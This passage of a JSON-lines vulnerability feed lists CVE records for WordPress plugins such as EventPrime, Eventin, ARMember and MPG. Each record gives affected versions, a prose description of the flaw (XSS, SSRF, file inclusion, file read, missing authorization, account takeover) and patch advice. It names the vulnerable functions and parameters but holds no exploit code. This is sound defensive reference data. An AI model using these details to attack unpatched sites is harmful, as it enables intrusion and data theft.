efsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/eventprime-event-calendar-management\\\/tags\\\/4.0.5.3\\\/includes\\\/class-ep-ajax.php#L971\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/eventprime-event-calendar-management\\\/tags\\\/4.0.5.3\\\/includes\\\/class-ep-ajax.php#L971\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/eventprime-event-calendar-management\\\/tags\\\/4.0.5.3\\\/includes\\\/class-eventprime-sanitizer.php#L122\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/eventprime-event-calendar-management\\\/tags\\\/4.0.5.3\\\/includes\\\/class-eventprime-sanitizer.php#L122\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9e51c8b5-cbb9-48aa-9c99-69f1b39fb0b4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9e51c8b5-cbb9-48aa-9c99-69f1b39fb0b4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13526","slug":"eventprime-event-calendar-management","versionImpact":"4.0.7.3","versionEndExcluding":"4.0.7.4","description":"The EventPrime \u2013 Events Calendar, Bookings and Tickets plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability checks on the export_submittion_attendees function in all versions up to, and including, 4.0.7.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to download list of attendees for any event.","recommendation":"Update to version 4.0.7.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/eventprime-event-calendar-management\\\/tags\\\/4.0.7.3\\\/includes\\\/class-ep-ajax.php#L1903\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/eventprime-event-calendar-management\\\/tags\\\/4.0.7.3\\\/includes\\\/class-ep-ajax.php#L1903\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2be578d9-27c3-4a16-a634-1514ed97a1a2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2be578d9-27c3-4a16-a634-1514ed97a1a2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10705","slug":"multiple-pages-generator-by-porthas","versionImpact":"4.0.5","versionEndExcluding":"4.0.6","description":"The Multiple Page Generator Plugin \u2013 MPG plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 4.0.5 via the 'mpg_download_file_by_link' function. This makes it possible for authenticated attackers, with editor-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.","recommendation":"Update to version 4.0.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3205550\\\/multiple-pages-generator-by-porthas\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3205550\\\/multiple-pages-generator-by-porthas\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7b3446e5-ca01-4468-927a-86e951e662ab?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7b3446e5-ca01-4468-927a-86e951e662ab?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10681","slug":"armember-membership","versionImpact":"4.0.51","versionEndExcluding":"4.0.52","description":"The The ARMember \u2013 Membership Plugin, Content Restriction, Member Levels, User Profile & User signup plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 4.0.51. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for authenticated attackers, with subscriber-level access and above, to execute arbitrary shortcodes.","recommendation":"Update to version 4.0.52, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3199747\\\/armember-membership\\\/trunk\\\/core\\\/classes\\\/class.arm_shortcodes.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3199747\\\/armember-membership\\\/trunk\\\/core\\\/classes\\\/class.arm_shortcodes.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ee0eead2-3eab-4a2a-bfe4-c0d8f91dc0a5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ee0eead2-3eab-4a2a-bfe4-c0d8f91dc0a5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1063","slug":"classified-listing","versionImpact":"4.0.4","versionEndExcluding":"4.0.5","description":"The Classified Listing \u2013 Classified ads & Business Directory Plugin plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.0.4 via the rtcl_taxonomy_settings_export function. This makes it possible for unauthenticated attackers to extract sensitive data including API keys and tokens.","recommendation":"Update to version 4.0.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3241883\\\/classified-listing\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3241883\\\/classified-listing\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e701b771-59f2-4783-b0a1-bea4d6c3d245?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e701b771-59f2-4783-b0a1-bea4d6c3d245?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9609","slug":"learnpress-import-export","versionImpact":"4.0.4","versionEndExcluding":"4.0.5","description":"The LearnPress Export Import \u2013 WordPress extension for LearnPress plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'learnpress_import_form_server' parameter in all versions up to, and including, 4.0.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 4.0.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c7429367-f9f4-4859-9537-0f543e32870a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c7429367-f9f4-4859-9537-0f543e32870a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/learnpress-import-export\\\/trunk\\\/inc\\\/admin\\\/views\\\/import.php#L23\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/learnpress-import-export\\\/trunk\\\/inc\\\/admin\\\/views\\\/import.php#L23\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/learnpress-import-export\\\/trunk\\\/inc\\\/admin\\\/providers\\\/learnpress\\\/class-lp-import-learnpress.php#L90\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/learnpress-import-export\\\/trunk\\\/inc\\\/admin\\\/providers\\\/learnpress\\\/class-lp-import-learnpress.php#L90\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3186901\\\/learnpress-import-export\\\/trunk\\\/inc\\\/admin\\\/views\\\/import.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3186901\\\/learnpress-import-export\\\/trunk\\\/inc\\\/admin\\\/views\\\/import.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3186901\\\/learnpress-import-export\\\/trunk\\\/inc\\\/admin\\\/providers\\\/learnpress\\\/class-lp-import-learnpress.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3186901\\\/learnpress-import-export\\\/trunk\\\/inc\\\/admin\\\/providers\\\/learnpress\\\/class-lp-import-learnpress.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6033","slug":"wp-event-solution","versionImpact":"4.0.4","versionEndExcluding":"4.0.5","description":"The Event Manager, Events Calendar, Tickets, Registrations \u2013 Eventin plugin for WordPress is vulnerable to unauthorized data importation due to a missing capability check on the 'import_file' function in all versions up to, and including, 4.0.4. This makes it possible for authenticated attackers, with Contributor-level access and above, to import events, speakers, schedules and attendee data.","recommendation":"Update to version 4.0.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1725c7f3-2fac-4714-a63e-6c43694483fc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1725c7f3-2fac-4714-a63e-6c43694483fc?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-event-solution\\\/trunk\\\/core\\\/admin\\\/hooks.php#L135\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-event-solution\\\/trunk\\\/core\\\/admin\\\/hooks.php#L135\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3117477\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3117477\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9865","slug":"eventprime-event-calendar-management","versionImpact":"4.0.4.7","versionEndExcluding":"4.0.4.8","description":"The EventPrime \u2013 Events Calendar, Bookings and Tickets plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018ep_booking_attendee_fields\u2019 fields in all versions up to, and including, 4.0.4.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses the transaction log for a booking.","recommendation":"Update to version 4.0.4.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/18ded977-5297-4b6f-b9f3-0567f995d08a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/18ded977-5297-4b6f-b9f3-0567f995d08a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3168585%40eventprime-event-calendar-management&new=3168585%40eventprime-event-calendar-management&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3168585%40eventprime-event-calendar-management&new=3168585%40eventprime-event-calendar-management&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3170503\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3170503\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9864","slug":"eventprime-event-calendar-management","versionImpact":"4.0.4.7","versionEndExcluding":"4.0.4.8","description":"The EventPrime \u2013 Events Calendar, Bookings and Tickets plugin for WordPress is vulnerable to Stored Cross-Site Scripting via ticket names in all versions up to, and including, 4.0.4.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This is only exploitable when front-end users can submit new events with tickets.","recommendation":"Update to version 4.0.4.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bc2a66cb-ad13-428f-a25a-b2807450aa16?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bc2a66cb-ad13-428f-a25a-b2807450aa16?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3170503\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3170503\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3474","slug":"mwp-skype","versionImpact":"4.0.3","versionEndExcluding":"4.0.4","description":"The Wow Skype Buttons WordPress plugin before 4.0.4 does not have CSRF checks in some bulk actions, which could allow attackers to make logged in admins perform unwanted actions, such as deleting buttons via CSRF attacks","recommendation":"Update to version 4.0.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e5c3e145-6738-4d85-8507-43ca1b1d5877\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e5c3e145-6738-4d85-8507-43ca1b1d5877\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4796","slug":"wp-event-solution","versionImpact":"4.0.34","versionEndExcluding":"4.0.35","description":"The Eventin plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 4.0.34. This is due to the plugin not properly validating a user's identity or capability prior to updating their details like email in the 'Eventin\\Speaker\\Api\\SpeakerController::update_item' function. This makes it possible for unauthenticated attackers with contributor-level and above permissions to change arbitrary user's email addresses, including administrators, and leverage that to reset the user's password and gain access to their account.","recommendation":"Update to version 4.0.35, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-event-solution\\\/tags\\\/4.0.28\\\/core\\\/speaker\\\/Api\\\/SpeakerController.php#L419\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-event-solution\\\/tags\\\/4.0.28\\\/core\\\/speaker\\\/Api\\\/SpeakerController.php#L419\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3336972\\\/wp-event-solution\\\/trunk\\\/core\\\/speaker\\\/Api\\\/SpeakerController.php#file0\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3336972\\\/wp-event-solution\\\/trunk\\\/core\\\/speaker\\\/Api\\\/SpeakerController.php#file0\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9e0d441d-1da5-45e7-8a14-ce178099c0cc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9e0d441d-1da5-45e7-8a14-ce178099c0cc?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4133","slug":"armember-membership","versionImpact":"4.0.30","versionEndExcluding":"4.0.31","description":"The ARMember \u2013 Membership Plugin, Content Restriction, Member Levels, User Profile & User signup plugin for WordPress is vulnerable to Open Redirect in all versions up to, and including, 4.0.30. This is due to insufficient validation on the redirect url supplied via the redirect_to parameter. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action.","recommendation":"Update to version 4.0.31, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/80d113aa-7401-4b58-a755-f64146d9fb08?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/80d113aa-7401-4b58-a755-f64146d9fb08?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3078683%40armember-membership%2Ftrunk&old=3069538%40armember-membership%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3078683%40armember-membership%2Ftrunk&old=3069538%40armember-membership%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5775","slug":"backwpup","versionEndExcluding":"4.0.3","description":"The BackWPup plugin for WordPress is vulnerable to Plaintext Storage of Backup Destination Password in all versions up to, and including, 4.0.2. This is due to the plugin improperly storing backup destination passwords in plaintext. This makes it possible for authenticated attackers, with administrator-level access, to retrieve the password from the password input field in the UI or from the options table where the password is stored.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4bce4f04-e622-468a-ac7e-5903ad50cc13?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4bce4f04-e622-468a-ac7e-5903ad50cc13?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3039678\\\/backwpup\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3039678\\\/backwpup\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10672","slug":"multiple-pages-generator-by-porthas","versionImpact":"4.0.2","versionEndExcluding":"4.0.3","description":"The Multiple Page Generator Plugin \u2013 MPG plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the mpg_upsert_project_source_block() function in all versions up to, and including, 4.0.2. This makes it possible for authenticated attackers, with editor-level access and above, to delete limited files on the server.","recommendation":"Update to version 4.0.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8c21de03-4d62-4ecf-a2f1-57e0e416792b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8c21de03-4d62-4ecf-a2f1-57e0e416792b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/multiple-pages-generator-by-porthas\\\/tags\\\/3.4.8\\\/controllers\\\/ProjectController.php#L147\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/multiple-pages-generator-by-porthas\\\/tags\\\/3.4.8\\\/controllers\\\/ProjectController.php#L147\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/multiple-pages-generator-by-porthas\\\/tags\\\/3.4.8\\\/controllers\\\/ProjectController.php#L139\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/multiple-pages-generator-by-porthas\\\/tags\\\/3.4.8\\\/controllers\\\/ProjectController.php#L139\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3183330\\\/multiple-pages-generator-by-porthas\\\/tags\\\/4.0.3\\\/controllers\\\/ProjectController.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3183330\\\/multiple-pages-generator-by-porthas\\\/tags\\\/4.0.3\\\/controllers\\\/ProjectController.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7621","slug":"atarim-visual-collaboration","versionImpact":"4.0.2","versionEndExcluding":"4.0.3","description":"The Visual Website Collaboration, Feedback & Project Management \u2013 Atarim plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the process_wpfeedback_misc_options() function in all versions up to, and including, 4.0.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update the plugins settings which can also be leveraged to gain access to the plugin's settings.","recommendation":"Update to version 4.0.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7f17e055-ad49-4115-89c5-dd76b6c531f7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7f17e055-ad49-4115-89c5-dd76b6c531f7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/atarim-visual-collaboration\\\/trunk\\\/inc\\\/wpf_function.php?rev=3116009#L235\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/atarim-visual-collaboration\\\/trunk\\\/inc\\\/wpf_function.php?rev=3116009#L235\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3133163\\\/atarim-visual-collaboration\\\/trunk\\\/inc\\\/wpf_function.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3133163\\\/atarim-visual-collaboration\\\/trunk\\\/inc\\\/wpf_function.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3419","slug":"wp-event-solution","versionImpact":"4.0.26","versionEndExcluding":"4.0.27","description":"The Event Manager, Events Calendar, Tickets, Registrations \u2013 Eventin plugin for WordPress is vulnerable to arbitrary file read in all versions up to, and including, 4.0.26 via the proxy_image() function. This makes it possible for unauthenticated attackers to read the contents of arbitrary files on the server, which can contain sensitive information.","recommendation":"Update to version 4.0.27, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3284545\\\/wp-event-solution\\\/trunk\\\/core\\\/Admin\\\/Hooks.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3284545\\\/wp-event-solution\\\/trunk\\\/core\\\/Admin\\\/Hooks.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1479071c-85c3-41fd-8ad7-f0dee32f201b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1479071c-85c3-41fd-8ad7-f0dee32f201b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1770","slug":"wp-event-solution","versionImpact":"4.0.24","versionEndExcluding":"4.0.25","description":"The Event Manager, Events Calendar, Tickets, Registrations \u2013 Eventin plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 4.0.24 via the 'style' parameter. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","recommendation":"Update to version 4.0.25, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-event-solution\\\/tags\\\/4.0.24\\\/widgets\\\/events-calendar\\\/events-calendar.php#L715\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-event-solution\\\/tags\\\/4.0.24\\\/widgets\\\/events-calendar\\\/events-calendar.php#L715\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-event-solution\\\/tags\\\/4.0.24\\\/widgets\\\/upcoming-event-tab\\\/style\\\/tab-1.php#L53\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-event-solution\\\/tags\\\/4.0.24\\\/widgets\\\/upcoming-event-tab\\\/style\\\/tab-1.php#L53\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3257023\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3257023\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5f24baee-7003-449b-9072-d95fa1e26c8f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5f24baee-7003-449b-9072-d95fa1e26c8f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1766","slug":"wp-event-solution","versionImpact":"4.0.24","versionEndExcluding":"4.0.25","description":"The Event Manager, Events Calendar, Tickets, Registrations \u2013 Eventin plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'payment_complete' function in all versions up to, and including, 4.0.24. This makes it possible for unauthenticated attackers to update the status of ticket payments to 'completed', possibly resulting in financial loss.","recommendation":"Update to version 4.0.25, or a newer patched version","refs":"[{\"url\":\"http:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-event-solution\\\/tags\\\/4.0.24\\\/core\\\/Order\\\/PaymentController.php#L97\",\"name\":\"http:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-event-solution\\\/tags\\\/4.0.24\\\/core\\\/Order\\\/PaymentController.php#L97\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3257023\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3257023\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f2bcaff9-bf04-4d8e-9422-c433264067ff?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f2bcaff9-bf04-4d8e-9422-c433264067ff?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0969","slug":"armember-membership","versionImpact":"4.0.24","versionEndExcluding":"4.0.25","description":"The ARMember plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.0.21 via the REST API. This makes it possible for unauthenticated attackers to bypass the plugin's \"Default Restriction\" feature and view restricted post content.","recommendation":"Update to version 4.0.25, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ea4e6718-4e1e-44ce-8463-860f0d3d80f5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ea4e6718-4e1e-44ce-8463-860f0d3d80f5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3030044\\\/armember-membership\\\/trunk\\\/core\\\/classes\\\/class.arm_restriction.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3030044\\\/armember-membership\\\/trunk\\\/core\\\/classes\\\/class.arm_restriction.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-52731","slug":"eventin-pro","versionImpact":"4.0.24","versionEndExcluding":"4.0.25","description":"Missing Authorization vulnerability in themefunction WordPress Event Manager, Event Calendar and Booking Plugin allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WordPress Event Manager, Event Calendar and Booking Plugin: from n\/a through 4.0.24.","recommendation":"Update to version 4.0.25, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/eventin-pro\\\/vulnerability\\\/wordpress-wordpress-event-manager-event-calendar-and-booking-plugin-plugin-4-0-24-arbitrary-content-deletion-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/eventin-pro\\\/vulnerability\\\/wordpress-wordpress-event-manager-event-calendar-and-booking-plugin-plugin-4-0-24-arbitrary-content-deletion-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-52730","slug":"eventin-pro","versionImpact":"4.0.24","versionEndExcluding":"4.0.25","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in themefunction WordPress Event Manager, Event Calendar and Booking Plugin allows Stored XSS. This issue affects WordPress Event Manager, Event Calendar and Booking Plugin: from n\/a through 4.0.24.","recommendation":"Update to version 4.0.25, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/eventin-pro\\\/vulnerability\\\/wordpress-wordpress-event-manager-event-calendar-and-booking-plugin-plugin-4-0-24-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/eventin-pro\\\/vulnerability\\\/wordpress-wordpress-event-manager-event-calendar-and-booking-plugin-plugin-4-0-24-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
